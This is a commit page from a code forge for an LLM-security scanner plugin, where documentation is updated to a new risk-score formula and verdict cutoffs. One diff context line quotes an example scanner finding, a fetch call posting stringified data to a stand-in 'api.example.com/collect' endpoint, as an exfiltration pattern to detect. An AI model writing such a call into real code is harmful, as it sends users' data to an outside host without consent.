open/ktg-plugin-marketplace
1
0
Fork 0
Code Issues Pull requests Releases Wiki Activity Actions

docs(scoring): unify scan/audit/mcp-scanner/posture-assessor to v2 formula

Browse source 
Closes the v7.1.1 out-of-scope item: commands/scan.md:113-114 retained
the v1 formula. Exploration found two more v1 surfaces that v7.1.1
missed: commands/audit.md:46 and agents/mcp-scanner-agent.md:419, plus
agents/posture-assessor-agent.md:376 (caught by the new doc-consistency
test). Four files unified to v2 in one atomic commit.

Three-way → four-way verdict-divergence is now closed:
- scanners/lib/severity.mjs (v2, BLOCK ≥65, WARNING ≥15) — authoritative
- agents/skill-scanner-agent.md (v2 since v7.1.1)
- templates/unified-report.md (v2 since v7.1.1)
- commands/scan.md (v2 — this commit)
- commands/audit.md (v2 — this commit)
- agents/mcp-scanner-agent.md (v2 — this commit)
- agents/posture-assessor-agent.md (v2 — this commit)

New: tests/lib/doc-consistency.test.mjs walks commands/ + agents/ and
asserts NO file contains v1 formula tokens. Pinned regex set:
  - score >= 61, score >= 21, score ≥ 61, score ≥ 21
  - critical * 25, Critical × 25
  - min(100, critical*25 ...)

Plus three v2-cutoff anchors asserting commands/scan.md, commands/audit.md,
and agents/mcp-scanner-agent.md document the v2 BLOCK ≥65 cutoff (or
reference riskScore() helper).

Tests: 1523 → 1551 (+28 from doc-consistency: 25 file walks + 3 anchors).
All green.
This commit is contained in:
Kjell Tore Guttormsen 2026-04-29 13:58:25 +02:00
commit d3b1157a08
5 changed files with 92 additions and 6 deletions
Download patch file Download diff file Expand all files Collapse all files

4
plugins/llm-security/agents/mcp-scanner-agent.md
View file

@ -416,8 +416,8 @@ server.js:142 — fetch('https://api.example.com/collect', { body: JSON.stringif
| **Medium** | Meaningful risk, requires attention | Excessive permissions vs. stated purpose, missing input validation on tool args, remote feature flags without disclosure, plaintext tokens in config |
| **Low** | Informational or best-practice gap | Unlocked dependency versions, missing README documentation, overly broad but not harmful env var access |
**Unified verdict:** `BLOCK` if Critical >= 1 OR score >= 61. `WARNING` if High >= 1 OR score >= 21. Otherwise `ALLOW`.
**Risk score:** `min((Critical × 25) + (High × 10) + (Medium × 4) + (Low × 1), 100)`.
**Unified verdict:** `BLOCK` if Critical ≥ 1 OR score ≥ 65. `WARNING` if High ≥ 1 OR score ≥ 15. Otherwise `ALLOW`. (v2 model — severity-dominated, see `scanners/lib/severity.mjs`.)
**Risk score:** `riskScore(counts)` — severity-dominated, log-scaled per tier. Critical present → 70-95; High only → 40-65; Medium only → 15-35; Low only → 1-11. `info` is scoring-inert.
**Always include** the `owasp` field (e.g., "LLM01", "LLM03") in every finding for OWASP categorization.
---

2
plugins/llm-security/agents/posture-assessor-agent.md
View file

@ -373,7 +373,7 @@ After completing all 10 categories:
- 3 or more Critical-severity findings from any source
Also compute and display the **risk score** (0-100) and **risk band** alongside the grade.
Use the formula: `score = min((Critical × 25) + (High × 10) + (Medium × 4) + (Low × 1), 100)`
Use the v2 model: `score = riskScore(counts)` (severity-dominated, log-scaled per tier — see `scanners/lib/severity.mjs`). Critical present → 70-95; High only → 40-65; Medium only → 15-35; Low only → 1-11. Verdict: critical ≥ 1 OR score ≥ 65 → BLOCK; high ≥ 1 OR score ≥ 15 → WARNING; else ALLOW. `info` is scoring-inert.
---